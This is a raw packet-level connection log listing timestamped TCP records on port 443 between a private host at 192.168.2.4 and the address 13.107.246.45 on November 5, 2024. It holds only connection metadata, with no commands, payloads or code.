Nov 5, 2024 18:45:57.331876993 CET	443	49752	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.331938982 CET	49752	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.332062006 CET	49752	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.332075119 CET	443	49752	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.565556049 CET	49744	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.565576077 CET	443	49744	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.919147968 CET	443	49748	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.919642925 CET	49748	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.919662952 CET	443	49748	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.920249939 CET	49748	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.920254946 CET	443	49748	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.953186989 CET	443	49749	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.953607082 CET	49749	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.953620911 CET	443	49749	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.954159975 CET	49749	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.954164982 CET	443	49749	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.954898119 CET	443	49750	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.955393076 CET	49750	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.955400944 CET	443	49750	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.955936909 CET	49750	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.955941916 CET	443	49750	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.994354963 CET	443	49751	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.994924068 CET	49751	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.994935989 CET	443	49751	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:57.996252060 CET	49751	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:57.996256113 CET	443	49751	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.069250107 CET	443	49748	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.069567919 CET	443	49748	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.069633007 CET	49748	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.069665909 CET	49748	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.069674969 CET	443	49748	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.069684029 CET	49748	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.069688082 CET	443	49748	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.072500944 CET	49753	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.072529078 CET	443	49753	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.072613001 CET	49753	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.072791100 CET	49753	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.072805882 CET	443	49753	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.074088097 CET	443	49752	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.074445963 CET	49752	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.074461937 CET	443	49752	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.074867010 CET	49752	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.074871063 CET	443	49752	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.082636118 CET	443	49750	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.082640886 CET	443	49749	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.083422899 CET	443	49749	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.083479881 CET	49749	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.083515882 CET	49749	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.083523989 CET	443	49749	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.083539963 CET	49749	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.083544016 CET	443	49749	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.084022999 CET	443	49750	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.084083080 CET	49750	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.084168911 CET	49750	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.084172964 CET	443	49750	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.084181070 CET	49750	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.084183931 CET	443	49750	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.085973024 CET	49754	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.086000919 CET	443	49754	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.086074114 CET	49754	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.086200953 CET	49754	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.086211920 CET	443	49754	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.086394072 CET	49755	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.086404085 CET	443	49755	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.086463928 CET	49755	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.086626053 CET	49755	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.086637974 CET	443	49755	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.127784014 CET	443	49751	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.127823114 CET	443	49751	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.127862930 CET	49751	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.128026962 CET	49751	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.128031015 CET	443	49751	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.130723000 CET	49756	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.130760908 CET	443	49756	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.130820990 CET	49756	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.130930901 CET	49756	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.130944967 CET	443	49756	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.203747034 CET	443	49752	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.203804970 CET	443	49752	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.203850985 CET	49752	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.204013109 CET	49752	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.204031944 CET	443	49752	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.204047918 CET	49752	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.204052925 CET	443	49752	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.207936049 CET	49757	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.207966089 CET	443	49757	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.208054066 CET	49757	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.208445072 CET	49757	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.208461046 CET	443	49757	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.814727068 CET	443	49753	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.815361023 CET	49753	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.815376043 CET	443	49753	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.815938950 CET	49753	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.815944910 CET	443	49753	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.836054087 CET	443	49754	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.836431980 CET	49754	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.836446047 CET	443	49754	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.837053061 CET	49754	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.837059021 CET	443	49754	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.837825060 CET	443	49755	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.838105917 CET	49755	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.838115931 CET	443	49755	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.838561058 CET	49755	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.838570118 CET	443	49755	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.875929117 CET	443	49756	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.876399040 CET	49756	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.876427889 CET	443	49756	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.876801968 CET	49756	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.876807928 CET	443	49756	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.947293043 CET	443	49757	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.947685003 CET	49757	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.947709084 CET	443	49757	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.948282957 CET	49757	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.948288918 CET	443	49757	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.949672937 CET	443	49753	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.950056076 CET	443	49753	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.950112104 CET	49753	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.950148106 CET	49753	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.950160027 CET	443	49753	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.950170040 CET	49753	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.950175047 CET	443	49753	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.953151941 CET	49758	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.953177929 CET	443	49758	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.953253031 CET	49758	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.953418016 CET	49758	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.953424931 CET	443	49758	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.967741013 CET	443	49754	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.967792988 CET	443	49754	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.967850924 CET	49754	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.967957973 CET	49754	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.967973948 CET	443	49754	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.967983961 CET	49754	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.967988968 CET	443	49754	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.970247984 CET	49759	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.970268965 CET	443	49759	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.970340014 CET	49759	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.970465899 CET	49759	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.970479965 CET	443	49759	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.970480919 CET	443	49755	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.970626116 CET	443	49755	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.970676899 CET	49755	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.970709085 CET	49755	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.970714092 CET	443	49755	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.970724106 CET	49755	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.970727921 CET	443	49755	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.974381924 CET	49760	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.974407911 CET	443	49760	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:58.974510908 CET	49760	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.974890947 CET	49760	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:58.974903107 CET	443	49760	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.007843971 CET	443	49756	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.007886887 CET	443	49756	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.007961035 CET	49756	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.015074968 CET	49756	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.015086889 CET	443	49756	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.015098095 CET	49756	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.015103102 CET	443	49756	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.017924070 CET	49761	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.017951012 CET	443	49761	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.018028975 CET	49761	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.018182039 CET	49761	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.018196106 CET	443	49761	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.078253984 CET	443	49757	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.078663111 CET	443	49757	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.078723907 CET	49757	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.078762054 CET	49757	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.078769922 CET	443	49757	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.078779936 CET	49757	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.078783989 CET	443	49757	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.080995083 CET	49762	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.081013918 CET	443	49762	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.081099033 CET	49762	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.081254005 CET	49762	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.081260920 CET	443	49762	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.710510015 CET	443	49758	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.711026907 CET	49758	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.711040974 CET	443	49758	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.711374044 CET	443	49759	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.711625099 CET	49759	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.711637020 CET	443	49759	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.711687088 CET	49758	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.711693048 CET	443	49758	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.712121010 CET	49759	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.712126970 CET	443	49759	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.714373112 CET	443	49760	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.714637995 CET	49760	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.714657068 CET	443	49760	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.715133905 CET	49760	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.715137959 CET	443	49760	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.756249905 CET	443	49761	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.756606102 CET	49761	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.756618977 CET	443	49761	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.757122040 CET	49761	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.757126093 CET	443	49761	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.839886904 CET	443	49758	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.840338945 CET	443	49758	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.840394974 CET	49758	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.840447903 CET	49758	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.840465069 CET	443	49758	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.840473890 CET	49758	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.840478897 CET	443	49758	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.843575001 CET	443	49759	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.843594074 CET	49763	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.843616962 CET	443	49763	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.843656063 CET	443	49759	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.843672037 CET	49763	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.843698978 CET	49759	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.843789101 CET	49759	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.843797922 CET	443	49759	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.843806028 CET	49759	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.843810081 CET	443	49759	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.843961000 CET	49763	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.843971968 CET	443	49763	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.844624043 CET	443	49760	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.844718933 CET	443	49760	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.844773054 CET	49760	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.844886065 CET	49760	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.844902039 CET	443	49760	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.844911098 CET	49760	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.844916105 CET	443	49760	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.847635984 CET	49764	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.847661972 CET	443	49764	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.847712994 CET	49764	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.847820997 CET	49764	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.847839117 CET	443	49764	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.848169088 CET	49765	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.848198891 CET	443	49765	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.848248959 CET	49765	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.848433018 CET	49765	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.848443985 CET	443	49765	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.888597012 CET	443	49761	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.888643026 CET	443	49761	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.888700008 CET	49761	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.890387058 CET	49761	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.890393972 CET	443	49761	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.890403986 CET	49761	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.890407085 CET	443	49761	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.914354086 CET	49766	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.914365053 CET	443	49766	13.107.246.45	192.168.2.4
Nov 5, 2024 18:45:59.914527893 CET	49766	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.914886951 CET	49766	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:45:59.914897919 CET	443	49766	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.100992918 CET	443	49762	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.101486921 CET	49762	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.101500988 CET	443	49762	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.101962090 CET	49762	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.101965904 CET	443	49762	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.238672972 CET	443	49762	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.238724947 CET	443	49762	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.238769054 CET	49762	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.238940001 CET	49762	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.238953114 CET	443	49762	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.238961935 CET	49762	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.238966942 CET	443	49762	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.241734028 CET	49767	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.241750956 CET	443	49767	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.241836071 CET	49767	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.242006063 CET	49767	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.242018938 CET	443	49767	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.567933083 CET	443	49765	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.568547010 CET	49765	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.568562984 CET	443	49765	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.569025993 CET	49765	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.569031954 CET	443	49765	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.584240913 CET	443	49763	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.584625006 CET	49763	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.584639072 CET	443	49763	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.585199118 CET	49763	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.585203886 CET	443	49763	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.602751970 CET	443	49764	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.603039026 CET	49764	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.603061914 CET	443	49764	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.603502989 CET	49764	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.603507996 CET	443	49764	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.676297903 CET	443	49766	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.676733017 CET	49766	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.676740885 CET	443	49766	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.677314997 CET	49766	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.677319050 CET	443	49766	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.696331024 CET	443	49765	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.696413994 CET	443	49765	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.696482897 CET	49765	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.696651936 CET	49765	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.696688890 CET	443	49765	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.696716070 CET	49765	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.696734905 CET	443	49765	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.699783087 CET	49768	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.699812889 CET	443	49768	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.699892998 CET	49768	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.700031996 CET	49768	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.700042963 CET	443	49768	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.724627972 CET	443	49763	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.724698067 CET	443	49763	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.724775076 CET	49763	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.724919081 CET	49763	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.724926949 CET	443	49763	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.724935055 CET	49763	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.724939108 CET	443	49763	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.735414028 CET	49769	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.735436916 CET	443	49769	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.735686064 CET	49769	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.736026049 CET	49769	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.736041069 CET	443	49769	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.737859011 CET	443	49764	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.737916946 CET	443	49764	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.737974882 CET	49764	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.738130093 CET	49764	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.738140106 CET	443	49764	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.738147974 CET	49764	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.738153934 CET	443	49764	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.740871906 CET	49770	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.740891933 CET	443	49770	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.740961075 CET	49770	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.741136074 CET	49770	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.741142988 CET	443	49770	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.809498072 CET	443	49766	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.810357094 CET	443	49766	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.810426950 CET	49766	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.810502052 CET	49766	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.810513020 CET	443	49766	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.810525894 CET	49766	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.810528994 CET	443	49766	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.813507080 CET	49771	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.813520908 CET	443	49771	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:00.813591957 CET	49771	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.813760996 CET	49771	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:00.813771963 CET	443	49771	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.018739939 CET	443	49767	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.019697905 CET	49767	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.019717932 CET	443	49767	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.020116091 CET	49767	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.020121098 CET	443	49767	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.158457994 CET	443	49767	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.158782005 CET	443	49767	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.158855915 CET	49767	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.158895969 CET	49767	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.158905983 CET	443	49767	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.158917904 CET	49767	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.158921957 CET	443	49767	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.162337065 CET	49772	443	192.168.2.4	13.107.246.45
